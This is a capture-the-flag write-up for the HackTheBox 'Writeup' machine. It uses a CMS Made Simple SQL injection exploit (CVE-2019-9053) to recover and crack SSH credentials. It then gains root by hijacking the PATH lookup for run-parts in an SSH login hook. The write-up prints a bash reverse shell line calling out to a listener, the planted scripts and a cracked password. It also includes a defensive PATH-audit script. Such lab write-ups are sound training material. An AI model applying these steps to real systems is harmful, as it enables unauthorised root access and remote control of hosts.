HackTheBox - Writeup


Writeup was a nice 20 point box created by jkr. It started with a CVE to get SSH creds, then abused an SSH login hook by injecting into its PATH to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.138 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.138

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP


We see from our scan that a robots.txt file is present on port 80. Browsing to it shows us the following:

#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `---''---`

# Disallow access to the blog until content is finished.
User-agent: * 
Disallow: /writeup/


Checking out the /writeup/ directory leads us to this webpage:


CMS Made Simple


The Firefox extension Wappalyzer tells us the site is using CMS Made Simple.

A quick Google search leads us to CVE-2019-9053. Running the exploit with the parameters shown below gives us a username and a cracked password:

# python cms_ex.py http://10.10.10.138/writeup -w rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9


Flag


We simply SSH into the box with these credentials and we get the user flag.

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: raykayjay9
...
jkr@writeup:~$ cat user.txt 
d4e493...


Root.txt

Pspy


Uploading and running pspy, we notice that the following process is run as root every time someone logs in via SSH:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new  

PATH and run-parts look interesting…


Groups


Running the id command, we also spot we are in the staff group:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr), ... 50(staff)

This group grants us certain privileges that we can abuse:

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name).

To confirm, we run the following command:

jkr@writeup:~$ find / -writable -group staff 2>/dev/null
/usr/local/bin
...
/usr/local/sbin


Exploitation


Because /usr/local/sbin and /usr/local/bin come before /usr/sbin and /usr/bin in the PATH that env -i sets, the lookup for run-parts checks those two directories first every time the process runs.

Therefore, by dropping our own run-parts script into either /usr/local/bin or /usr/local/sbin, we hijack the PATH lookup and get code of our choosing executed with root privileges.

Since our staff group membership lets us write to both of these directories, we are able to exploit this.
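As an added example (not part of the original writeup), the bash script below performs the same check the find command above does, but scoped to the exact PATH string from the pspy output: it resolves which directory would supply a command under that PATH and flags any earlier directory the invoking account can write to. MOTD_PATH is copied from the pspy line; the function names and the directory layout the comments mention are the example's own.

```bash
#!/bin/bash
# Added example, not code from the original writeup: audit a PATH string for
# writable directories that precede the directory that really provides a
# command. The value below is the PATH the motd run-parts process used.

MOTD_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'

# resolve_in_path NAME PATHSTRING
# Prints the first directory in PATHSTRING holding an executable NAME, using
# the same left-to-right rule env/execvp use; returns 1 if none is found.
resolve_in_path() {
    local name=$1 pathstr=$2 dir
    local IFS=':'
    for dir in $pathstr; do
        if [ -x "$dir/$name" ] && [ ! -d "$dir/$name" ]; then
            printf '%s\n' "$dir"
            return 0
        fi
    done
    return 1
}

# writable_path_dirs PATHSTRING
# Prints every existing directory in PATHSTRING that the caller can write to
# (owner, group such as staff, or world write bit).
writable_path_dirs() {
    local pathstr=$1 dir
    local IFS=':'
    for dir in $pathstr; do
        [ -d "$dir" ] && [ -w "$dir" ] && printf '%s\n' "$dir"
    done
    return 0
}

# shadow_check NAME PATHSTRING
# Prints the first writable directory that precedes the directory currently
# providing NAME and returns 0; returns 1 when no such directory exists.
# This is exactly the condition the motd hook exposes for run-parts.
shadow_check() {
    local name=$1 pathstr=$2 dir real
    real=$(resolve_in_path "$name" "$pathstr") || return 1
    local IFS=':'
    for dir in $pathstr; do
        [ "$dir" = "$real" ] && break
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
            return 0
        fi
    done
    return 1
}

# Run directly: audit the motd hook's PATH on this host as the current user.
if hit=$(shadow_check run-parts "$MOTD_PATH"); then
    echo "WARNING: $hit is writable and precedes the real run-parts"
else
    echo "OK: no writable directory precedes run-parts in $MOTD_PATH"
fi
```

Run it as the unprivileged account you are auditing (jkr here), since the -w test answers for the caller, not for root. The shadowing it reports is created by the hook's PATH, so it disappears if the hook calls run-parts by absolute path or drops the /usr/local entries from that PATH.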

First create a root.sh shell script in /usr/local/bin/ and make it executable:

jkr@writeup:~$ echo '#!/bin/bash' > /usr/local/bin/root.sh
jkr@writeup:~$ echo 'bash -i >& /dev/tcp/10.10.14.4/443 0>&1' >> /usr/local/bin/root.sh
jkr@writeup:~$ chmod +x /usr/local/bin/root.sh

Then create a new run-parts script in /usr/local/bin/ to call our reverse shell script:

jkr@writeup:~$ echo '#!/bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ echo '/usr/local/bin/root.sh' >> /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts


Flag


All we need to do now is start a new SSH session and have a netcat listener ready. Our run-parts script will be executed upon logging in via SSH, subsequently running our bash reverse shell script as root.

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password: raykayjay9
# nc -nlvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:55000.
root@writeup:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@writeup:/# cat /root/root.txt
eeba47...